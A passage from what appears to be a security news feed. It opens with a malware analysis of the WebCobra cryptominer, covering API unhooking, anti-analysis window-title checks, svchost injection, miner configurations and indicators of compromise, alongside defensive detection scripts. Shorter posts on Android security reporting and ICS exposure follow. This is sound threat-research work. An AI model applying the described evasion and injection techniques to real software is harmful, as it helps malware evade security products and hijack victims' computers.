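    return plain.translate(bytes(inverse))


if __name__ == "__main__":
    # Constructed sample: if the payload were a PE file, its "MZ" magic
    # would be stored as these two bytes.
    magic = encrypted_form(b"MZ")
    print("encrypted form of 'MZ':", magic.hex())
    print("decoded again:", decrypt(magic))
    print("substitution is one-to-one:", is_bijection())
```

Because the mapping is a one-to-one byte substitution, repeated plaintext bytes stay repeated in the encrypted file, so byte-frequency analysis and fixed-offset signatures both still work on data.bin.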

The program checks the running environment to launch the proper miner, shown in the following diagram:

Figure 7: Launching the proper miner depending on a system’s configuration.

Once data.bin is decrypted and executed, it tries a few anti-debugging, anti-emulation, and anti-sandbox techniques as well as checks of other security products running on the system. These steps allow the malware to remain undetected for a long time.

Most security products hook some APIs to monitor the behavior of malware. To avoid being found by this technique, WebCobra loads ntdll.dll and user32.dll as data files in memory and overwrites the first 8 bytes of those functions, which unhooks the APIs.

List of unhooked ntdll.dll APIs

  • LdrLoadDll
  • ZwWriteVirtualMemory
  • ZwResumeThread
  • ZwQueryInformationProcess
  • ZwOpenSemaphore
  • ZwOpenMutant
  • ZwOpenEvent
  • ZwMapViewOfSection
  • ZwCreateUserProcess
  • ZwCreateSemaphore
  • ZwCreateMutant
  • ZwCreateEvent
  • RtlQueryEnvironmentVariable
  • RtlDecompressBuffer

List of unhooked user32.dll APIs

  • SetWindowsHookExW
  • SetWindowsHookExA

Infecting an x86 system

The malware injects malicious code into svchost.exe and uses an infinite loop to check all open windows and to compare each window’s title bar text with the following strings. This is another check by WebCobra to determine if it is running in an isolated environment designed for malware analysis.

  • adw
  • emsi
  • avz
  • farbar
  • glax
  • delfix
  • rogue
  • exe
  • asw_av_popup_wndclass
  • snxhk_border_mywnd
  • AvastCefWindow
  • AlertWindow
  • UnHackMe
  • eset
  • hacker
  • AnVir
  • Rogue
  • uVS
  • malware

An open window is terminated if any of the preceding strings appears in its title bar text.

Figure 8: Terminating a process if the windows title bar text contains specific strings.

Once the process monitor executes, it creates an instance of svchost.exe with the miner’s configuration file specified as an argument and injects the Cryptonight miner code.

Figure 9: Creating an instance of svchost.exe and executing the Cryptonight miner.

Finally, the malware resumes the process with the Cryptonight miner running silently and consuming almost all the CPU’s resources.

Figure 10: An x86 machine infected with the Cryptonight miner. 
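One host-side check for the svchost.exe instance described above, as an added example that is not part of the McAfee analysis. It assumes legitimate svchost.exe instances run from System32 or SysWOW64, are started by services.exe and carry a -k switch; the event field names, process names and paths in the sample are constructed.

```python
import ntpath  # Windows path rules, usable on any platform

# Assumption: directories a genuine svchost.exe runs from.
EXPECTED_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}


def svchost_findings(event):
    """Return the reasons a process-creation event looks like a spoofed or
    hijacked svchost.exe; an empty list means nothing stood out."""
    image = event["image"]
    if ntpath.basename(image).lower() != "svchost.exe":
        return []
    findings = []
    if ntpath.normcase(ntpath.dirname(image)) not in EXPECTED_DIRS:
        findings.append("unexpected-path")
    if ntpath.basename(event["parent_image"]).lower() != "services.exe":
        findings.append("unexpected-parent")
    # The page describes svchost.exe started with a configuration file as
    # its argument; a service host is expected to carry "-k <group>".
    tokens = [tok.lower() for tok in event["command_line"].split()]
    if "-k" not in tokens:
        findings.append("missing-k-switch")
    return findings


def triage(events):
    """Map pid -> findings for every event that raised at least one."""
    flagged = {}
    for event in events:
        findings = svchost_findings(event)
        if findings:
            flagged[event["pid"]] = findings
    return flagged


# Constructed process-creation events (not taken from a real host).
SAMPLE_EVENTS = [
    {"pid": 812,
     "image": r"C:\Windows\System32\svchost.exe",
     "parent_image": r"C:\Windows\System32\services.exe",
     "command_line": r"C:\Windows\System32\svchost.exe -k netsvcs -p"},
    {"pid": 4120,
     "image": r"C:\Windows\System32\svchost.exe",
     "parent_image": r"C:\Users\Public\monitor.exe",
     "command_line":
         r"C:\Windows\System32\svchost.exe C:\ProgramData\example\miner.cfg"},
    {"pid": 5230,
     "image": r"C:\Users\Public\svchost.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"svchost.exe -k netsvcs"},
    {"pid": 6001,
     "image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"notepad.exe"},
]

if __name__ == "__main__":
    for pid, findings in triage(SAMPLE_EVENTS).items():
        print(pid, ", ".join(findings))
```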

Infecting an x64 system

The malware terminates the infection if it finds Wireshark running.

Figure 11: Checking for Wireshark.

The malware checks the GPU brand and mode. It runs only if one of the following GPUs is installed:

  • Radeon
  • Nvidia
  • Asus

Figure 12: Checking the GPU mode.

If these checks are successful, the malware creates the following folder with hidden attributes and downloads and executes Claymore’s Zcash miner from a remote server.

  • C:\Users\AppData\Local\WIX Toolset 11.2

Figure 13: Requesting the download of Claymore’s Zcash miner.

Figure 14: Claymore’s miner.

Figure 15: Executing the miner with its configuration file.

Finally, the malware drops a batch file at %temp%\–xxxxx.cMD to delete the main dropper from [WindowsFolder]\{DE03ECBA-2A77-438C-8243-0AF592BDBB20}\*.*.

Figure 16: A batch file deleting the dropper.

The configuration files of the miners follow.

Figure 17: Cryptonight’s configuration file.

This configuration file contains:

  • The mining pool: 5.149.254.170
  • Username: 49YfyE1xWHG1vywX2xTV8XZzbzB1E2QHEF9GtzPhSPRdK5TEkxXGRxVdAq8LwbA2Pz7jNQ9gYBxeFPHcqiiqaGJM2QyW64C
  • Password: soft-net

Figure 18: Claymore’s Zcash miner configuration file.

This configuration file contains:

  • The mining pool: eu.zec.slushpool.com
  • Username: pavelcom.nln
  • Password: zzz

Coin mining malware will continue to evolve as cybercriminals take advantage of this relatively easy path to stealing value. Mining coins on other people’s systems requires less investment and risk than ransomware, and does not depend on a percentage of victims agreeing to send money. Until users learn they are supporting criminal miners, the latter have much to gain.

MITRE ATT&CK techniques

  • Exfiltration over command and control channel
  • Command-line interface
  • Hooking
  • Data from local system
  • File and directory discovery
  • Query registry
  • System information discovery
  • Process discovery
  • System time discovery
  • Process injection
  • Data encrypted
  • Data obfuscation
  • Multilayer encryption
  • File deletion

Indicators of compromise

IP addresses

  • 5.149.249[.]13:2224
  • 5.149.254[.]170:2223
  • 104.31.92[.]212

Domains

  • emergency.fee.xmrig[.]com
  • miner.fee.xmrig[.]com
  • saarnio[.]ru
  • eu.zec.slushpool[.]com
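A sweep of DNS and connection logs for the network indicators above, as an added example that is not part of the McAfee post. The indicators are copied from the page; the log format, host names and log lines are constructed.

```python
import ipaddress

# Network indicators copied from the page's list, still defanged.
DEFANGED_IPS = ["5.149.249[.]13:2224", "5.149.254[.]170:2223",
                "104.31.92[.]212"]
DEFANGED_DOMAINS = ["emergency.fee.xmrig[.]com", "miner.fee.xmrig[.]com",
                    "saarnio[.]ru", "eu.zec.slushpool[.]com"]


def refang(value):
    """Undo the [.] defanging and normalise case."""
    return value.strip().replace("[.]", ".").lower()


def parse_ip_indicator(value):
    """Split 'ip:port' into (ip, port); port is None when none is listed."""
    host, _, port = refang(value).partition(":")
    return str(ipaddress.ip_address(host)), (int(port) if port else None)


IP_IOCS = dict(parse_ip_indicator(v) for v in DEFANGED_IPS)
DOMAIN_IOCS = [refang(d) for d in DEFANGED_DOMAINS]


def match_domain(qname):
    """Match an indicator or any of its subdomains, on a label boundary,
    so 'notsaarnio.ru' does not match 'saarnio.ru'."""
    name = qname.rstrip(".").lower()
    for ioc in DOMAIN_IOCS:
        if name == ioc or name.endswith("." + ioc):
            return ioc
    return None


def match_ip(ip, port):
    """'ip+port' when both agree with the page, 'ip-only' when only the
    address does (a weaker signal), None otherwise."""
    if ip not in IP_IOCS:
        return None
    return "ip+port" if IP_IOCS[ip] == port else "ip-only"


def sweep(lines):
    """Return (host, indicator, kind) for every log line that hits."""
    hits = []
    for line in lines:
        fields = dict(tok.split("=", 1) for tok in line.split()[1:])
        if fields.get("type") == "dns":
            ioc = match_domain(fields["query"])
            if ioc:
                hits.append((fields["host"], ioc, "domain"))
        elif fields.get("type") == "conn":
            ip, _, port = fields["dst"].rpartition(":")
            kind = match_ip(ip, int(port))
            if kind:
                hits.append((fields["host"], ip, kind))
    return hits


# Constructed log lines in a made-up key=value format.
SAMPLE_LOG = [
    "2018-11-13T09:14:02Z host=ws-114 type=dns query=eu.zec.slushpool.com.",
    "2018-11-13T09:14:05Z host=ws-114 type=conn dst=5.149.254.170:2223",
    "2018-11-13T09:15:40Z host=ws-207 type=dns query=notsaarnio.ru",
    "2018-11-13T09:16:11Z host=ws-207 type=conn dst=5.149.249.13:443",
    "2018-11-13T09:17:30Z host=ws-031 type=dns query=cdn.saarnio.ru",
    "2018-11-13T09:18:02Z host=ws-031 type=conn dst=192.0.2.10:2223",
]

if __name__ == "__main__":
    for hit in sweep(SAMPLE_LOG):
        print(*hit)
```

A hit on a mining-pool hostname shows mining traffic from that host; pair it with the host-side behaviour described earlier before attributing it to WebCobra.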

McAfee detections

  • CoinMiner Version 2 in DAT Version 8986; Version 3 in DAT Version 3437
  • l Version 2 in DAT Version 9001; Version 3 in DAT Version 3452
  • RDN/Generic PUP.x Version 2 in DAT Version 8996; Version 3 in DAT Version 3447
  • Trojan-FQBZ, Trojan-FQCB, Trojan-FQCR Versions 2 in DAT Version 9011; Versions 3 in DAT Version 3462

Hashes (SHA-256)


The post WebCobra Malware Uses Victims’ Computers to Mine Cryptocurrency appeared first on McAfee Blogs.

Android Ecosystem Security Transparency Report is a wary first step

Reading through Google’s first quarterly Android Ecosystem Security Transparency Report feels like a mix of missed opportunities and déjà vu all over again.

Much of what is in the new Android ecosystem security report is data that has been part of Google’s annual Android Security Year in Review report, including the rates of potentially harmful applications (PHAs) on devices with and without sideloaded apps — spoiler alert: sideloading is much riskier — and rates of PHAs by geographical region. Surprisingly, the rates in Russia are lower than in the U.S.

The only other data in the Android ecosystem security report shows the percentage of devices with at least one PHA installed based on Android version. This new data shows that the newer the version of Android, the less likely it is a device will have a PHA installed.

However, this also hints at the data Google didn’t include in the report, like how well specific hardware partners have done in updating devices to those newer versions of Android. Considering that Android 7.x Nougat is the most common version of the OS in the wild at 28.2% and the latest version 9.0 Pie hasn’t even cracked the 0.1% marker to be included in Google’s platform numbers, the smart money says OEM updating stats wouldn’t be too impressive.

There’s also the matter of Android security updates and the data around which hardware partners are best at pushing them out. Dave Kleidermacher, head of Android security and privacy, said at the Google I/O developer conference in May 2018 that the company was tracking which partners were best at pushing security updates and that it was considering adding hardware support details to future Android Ecosystem Security Transparency Reports. More recently, Google added stipulations to its OEM contracts mandating at least four security updates per year on Android devices.

It’s unclear why Google ultimately didn’t include this data in the report on Android ecosystem security, but Google has been hesitant to call out hardware partners for slow updates in the past. In addition to new requirements in Android partner contracts regarding security updates, there have been rules stating hardware partners need to update any device to the latest version of Android released in the first 18 months after a device launch. However, it has always been unclear what the punishment would be for breaking those rules. Presumably, it would be a ban on access to Google Play services, the Play Store and Google Apps, but there have never been reports of those penalties being enforced.

Google has taken steps to make Android updates easier, including Project Treble in Android 8.0 Oreo, which effectively decoupled the Android system from any software differentiation added by a hardware partner. But, since Android 7.x is still the most common version in the wild, it doesn’t appear as though that work has yielded much fruit yet.

Adding OS and security update stats to the Android Ecosystem Security Transparency Report could go a long way towards shaming OEMs into being better and giving consumers more information with which to make purchasing decisions, but time will tell if Google ever goes so far as to name OEMs specifically.

The post Android Ecosystem Security Transparency Report is a wary first step appeared first on Security Bytes.

The state of ICS and IIoT security in 2019

40 percent of industrial sites have at least one direct connection to the public internet

Air gaps for critical systems remain an effective way to reduce the chance of attack. No connection to the web means threat actors have to be on-site to conduct operations. However, many companies are failing to ensure they are air-gapped. Over a third of industrial sites have at least one route to the internet. Search tools such as Shodan make it easier to find any devices not properly secured, giving attackers easy entry into industrial networks, and one is enough for attackers to get in.